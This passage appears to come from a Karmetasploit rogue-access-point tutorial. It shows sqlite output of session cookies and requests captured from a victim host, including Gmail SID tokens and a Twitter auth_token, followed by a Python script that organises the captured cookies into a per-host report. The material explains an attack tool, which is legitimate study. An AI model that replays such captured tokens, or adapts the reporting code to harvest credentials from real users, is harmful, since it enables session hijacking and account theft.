14|2009-05-09 23:47:06|1|http_cookies|gmail.google.com PREF=ID=ee60297d21c2a6e5:U=ecaec12d78faa1ba:TM=1241913986:LM=1241926890:GM=1:S=-p5nGxSz_oh1inss; NID=22=Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID=DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
15|2009-05-09 23:47:07|1|http_request|gmail.google.com:80 GET /forms.html Windows FF 1.9.0.10
16|2009-05-09 23:47:07|1|http_cookies|google.com PREF=ID=ee60297d21c2a6e5:U=ecaec12d78faa1ba:TM=1241913986:LM=1241926890:GM=1:S=-p5nGxSz_oh1inss; NID=22=Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID=DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
17|2009-05-09 23:47:07|1|http_request|google.com:80 GET /forms.html Windows FF 1.9.0.10
18|2009-05-09 23:47:07|1|http_request|linkedin.com:80 GET /forms.html Windows FF 1.9.0.10
101|2009-05-09 23:50:03|1|http_cookies|safebrowsing.clients.google.com PREF=ID=ee60297d21c2a6e5:U=ecaec12d78faa1ba:TM=1241913986:LM=1241926890:GM=1:S=-p5nGxSz_oh1inss; NID=22=Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID=DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
102|2009-05-09 23:50:03|1|http_request|safebrowsing.clients.google.com:80 POST /safebrowsing/downloads Windows FF 1.9.0.10
108|2009-05-10 00:43:29|1|http_cookies|twitter.com auth_token=1241930535--c2a31fa4627149c521b965e0d7bdc3617df6ae1f
109|2009-05-10 00:43:29|1|http_cookies|www.twitter.com auth_token=1241930535--c2a31fa4627149c521b965e0d7bdc3617df6ae1f
sqlite>
Beyond this point, it is up to your database knowledge and to how you choose to report the recorded information.
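As a starting point for such reporting, here is an added Python example (not part of Metasploit or Karmetasploit) that recreates the hosts and notes tables from the .schema output above in an in-memory SQLite database, loads constructed rows shaped like the query output above, and builds a per-host report: OS fingerprint, first and last activity, note counts per type, which cookie names were sent to which domain, and how many requests went to each domain. The layout of the note data ("domain cookies" and "host:port METHOD path agent") is an assumption read from that output.

```python
"""Per-host report over a karma.db-style SQLite database (added example)."""
import json
import sqlite3
from collections import defaultdict

# Column lists taken from the .schema output on the page; "desc" is a
# reserved word, so it is double-quoted here.
SCHEMA = """
CREATE TABLE hosts (
  id INTEGER PRIMARY KEY NOT NULL, created TIMESTAMP, address VARCHAR(16) UNIQUE,
  comm VARCHAR(255), name VARCHAR(255), state VARCHAR(255), "desc" VARCHAR(1024),
  os_name VARCHAR(255), os_flavor VARCHAR(255), os_sp VARCHAR(255),
  os_lang VARCHAR(255), arch VARCHAR(255)
);
CREATE TABLE notes (
  id INTEGER PRIMARY KEY NOT NULL, created TIMESTAMP, host_id INTEGER,
  ntype VARCHAR(512), data TEXT
);
"""

# Constructed rows shaped like the "select * from hosts/notes" output above
# (cookie values shortened; only the cookie names matter for the report).
HOSTS = [(1, "2009-05-09 23:47:04", "10.0.0.100", None, None, "alive", None,
          "Windows", "2000", None, None, "x86")]
NOTES = [
    (1, "2009-05-09 23:47:04", 1, "http_cookies",
     "en-us.start2.mozilla.com __utma=183859642.1; __utmz=183859642.1.1"),
    (2, "2009-05-09 23:47:04", 1, "http_request",
     "en-us.start2.mozilla.com:80 GET /firefox Windows FF 1.9.0.10"),
    (3, "2009-05-09 23:47:05", 1, "http_cookies",
     "gmail.google.com PREF=ID=ee60297d21c2a6e5:U=ecaec12d78faa1ba; "
     "NID=22=Yse3kJm0; SID=DQAAAHAAAADNMtnG"),
    (4, "2009-05-09 23:47:05", 1, "http_request",
     "gmail.google.com:80 GET /forms.html Windows FF 1.9.0.10"),
    (5, "2009-05-09 23:47:07", 1, "http_request",
     "linkedin.com:80 GET /forms.html Windows FF 1.9.0.10"),
    (6, "2009-05-10 00:43:29", 1, "http_cookies",
     "twitter.com auth_token=1241930535--c2a31fa4627149c521b965e0d7bdc3617df6ae1f"),
]


def open_sample_db():
    """In-memory copy of the sample data; use sqlite3.connect('karma.db') for a real file."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO hosts VALUES (?,?,?,?,?,?,?,?,?,?,?,?)", HOSTS)
    conn.executemany("INSERT INTO notes VALUES (?,?,?,?,?)", NOTES)
    conn.commit()
    return conn


def cookie_names(cookie_str):
    """'a=1; b=2=3' -> ['a', 'b']: the report keeps cookie names, not their values."""
    return [c.strip().split("=", 1)[0] for c in cookie_str.split(";") if c.strip()]


def build_report(conn):
    """One entry per host: fingerprint, activity window, note counts, cookie and request domains."""
    report = {}
    for hid, addr, os_name, os_flavor, arch in conn.execute(
            "SELECT id, address, os_name, os_flavor, arch FROM hosts"):
        counts = dict(conn.execute(
            "SELECT ntype, COUNT(*) FROM notes WHERE host_id = ? GROUP BY ntype", (hid,)))
        first, last = conn.execute(
            "SELECT MIN(created), MAX(created) FROM notes WHERE host_id = ?", (hid,)).fetchone()
        cookies, requests = defaultdict(list), defaultdict(int)
        for ntype, data in conn.execute(
                "SELECT ntype, data FROM notes WHERE host_id = ? ORDER BY id", (hid,)):
            if ntype == "http_cookies":          # assumed layout: "domain c1=v; c2=v"
                domain, _, cookie_str = data.partition(" ")
                cookies[domain].extend(cookie_names(cookie_str))
            elif ntype == "http_request":        # assumed layout: "host:port METHOD path agent"
                hostport = data.split(" ", 1)[0]
                requests[hostport.rsplit(":", 1)[0]] += 1
        report[addr] = {
            "os": f"{os_name} {os_flavor} ({arch})",
            "first_seen": first,
            "last_seen": last,
            "note_counts": counts,
            "cookies_by_domain": dict(cookies),
            "requests_by_domain": dict(requests),
        }
    return report


if __name__ == "__main__":
    print(json.dumps(build_report(open_sample_db()), indent=2))
```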